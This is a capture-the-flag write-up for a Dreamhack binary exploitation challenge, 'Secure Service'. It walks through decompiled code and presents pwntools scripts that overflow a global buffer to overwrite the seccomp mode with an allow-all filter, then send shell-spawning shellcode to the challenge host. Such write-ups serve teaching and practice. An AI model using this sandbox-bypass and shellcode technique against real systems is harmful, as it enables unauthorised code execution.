Write-up of the challenge “Secure Service”#

This challenge is part of the “Binary exploitation” category and is in level 4.

Goal of the challenge#

The objective of the challenge is to change the seccomp filter to 2.

Program structure#

1
int64_t bof()
2
{
3
    puts("You chose to bof to attack my system.");
4
    printf("payload: ");
5
    return __isoc99_scanf("%278s", &g_buf);
6
}
7

8
int32_t sandbox()
9
{
10
    if (prctl(0x26, 1, 0, 0, 0) == 0xffffffff)
11
    {
12
        exit(1);
13
        /* no return */
14
    }
15

16
    int32_t result = prctl(0x16, seccomp_mode, &prog);
17

18
    if (result != 0xffffffff)
19
        return result;
20

21
    exit(1);
22
    /* no return */
23
}
24

25
int64_t shellcode()
26
{
27
    void *fsbase;
28
    int64_t rax = *(fsbase + 0x28);
29
    void buf;
30
    memset(&buf, 0x90, 0x80);
31
    puts("You chose to shellcode to attack my system.");
32

33
    printf("shellcode: ");
34
    read(0, &buf, 0x80);
35
    sandbox();
36
    (&buf)();
37

38
    if (rax == *(fsbase + 0x28))
39
        return rax - *(fsbase + 0x28);
40

41
    __stack_chk_fail();
42
    /* no return */
43
}
44

45
int32_t main(int32_t argc, char **argv, char **envp)
46
{
47
    void *fsbase;
48
    int64_t var_10 = *(fsbase + 0x28);
49
    init();
50
    char var_38[0x28];
51
    memset(&var_38, 0, 0x20);
52
    puts("We made a nice " sandbox " program :)");
53
    puts("Feel free to try to attack our service. No one can infiltrate our system :)");
54

55
    while (true)
56
    {
57
        printf("which method? ");
58
        __isoc99_scanf("%31s", &var_38);
59

60
        if (strcmp(&var_38, "bof"))
61
        {
62
            if (strcmp(&var_38, "shellcode"))
63
            {
64
                if (!strcmp(&var_38, "quit"))
65
                    break;
66
            }
67
            else
68
                shellcode();
69
        }
70
        else
71
            bof();
72
    }
73

74
    exit(0);
75
    /* no return */
76
}

Problem#

As soon I saw the seccomp I attempted to execute open->read->write hopefully I would not trigger the seccomp and unforunately I did so now I started to think of ways I could bypass it.

Security breach#

The problem is that here they are letting us read even after the position seccomp_mode.

1
puts("You chose to bof to attack my system.");
2
printf("payload: ");
3
return __isoc99_scanf("%278s", &g_buf);

Solution#

So after trying open->read->write which did not work:

1
from pwn import *
2

3
context.arch = "amd64"
4
context.binary = "secure-service"
5

6
p = process("./secure-service")
7

8
p.sendlineafter(b'?', b"shellcode")
9

10
payload = shellcraft.open('/flag')
11
payload += shellcraft.mov('rbx', 'rax')
12
payload += shellcraft.read('rbx', 'rsp', 100)
13
payload += shellcraft.write(1, 'rsp', 100)
14

15
p.sendlineafter(b':', asm(payload))
16

17
p.interactive()

I started thinking about what the issue might be then I thought I might need to use the option bof to perform something because it exists in the binary for a reason I guees. I suspect we failed because some seccomp filters does not allow open. So I started thinking what if we could overwrite the seccomp mode in the buffer overflow to maybe like 2. I started by finding the seccomp:

1
nm ./secure-service | grep 'sec'
2
0000000000004180 D seccomp_mode

After that I wanted to find the start of our buffer:

1
nm ./secure-service | grep 'buf'
2
0000000000004080 D g_buf

So now for our experiemnt I want to check if the offset is within our reach:

1
0000000000004180-0000000000004080 = 256

That is within our reach since we are reading 278 bytes in the bof option:

1
return __isoc99_scanf("%278s", &g_buf);

So we need to overwrite the mode to 2 but also mode 2 just means read the rule from the buffer so we need to also set the rules in the buffer. Here’s how that is handled in seccomp:

1
struct sock_filter {
2
    __u16 code;  // 2 bytes: The Operation (What to do)
3
    __u8  jt;
4
    __u8  jf;
5
    __u32 k;     // 4 bytes: The Value (The return value)
6
};

So we need to create a rule that allow everything for example 0x7fff000000000006 which is return allow. So the summary here is that we need to overwrite the seccomp to 2 and also before that set many allow everything so that when the seccomp reads from the buffer it will read the rule return allow, which will let any shell pass. Then all we need to do is select the shellcode option and send a shell. How we got 0x7fff000000000006 is that the start means 7fff0000 allow and the end mean 6 ret.

1
from pwn import *
2

3
# p = process('./secure-service')
4
p = remote('host3.dreamhack.games', 13686)
5

6
context.arch = 'amd64'
7

8
seccomp_allow = p64(0x7fff000000000006)
9

10
offset_to_overwite = 0x000000000004180 - 0x000000000004080
11

12
payload = seccomp_allow * 30
13
payload += b'A' * (offset_to_overwite - len(payload))
14
payload += p64(2)
15

16

17
p.sendlineafter(b'method? ', b'bof')
18
p.sendline(payload)
19

20
p.sendline(b'shellcode')
21

22
sc = asm(shellcraft.sh())
23

24
p.sendlineafter(b'shellcode: ', sc)
25

26
p.interactive()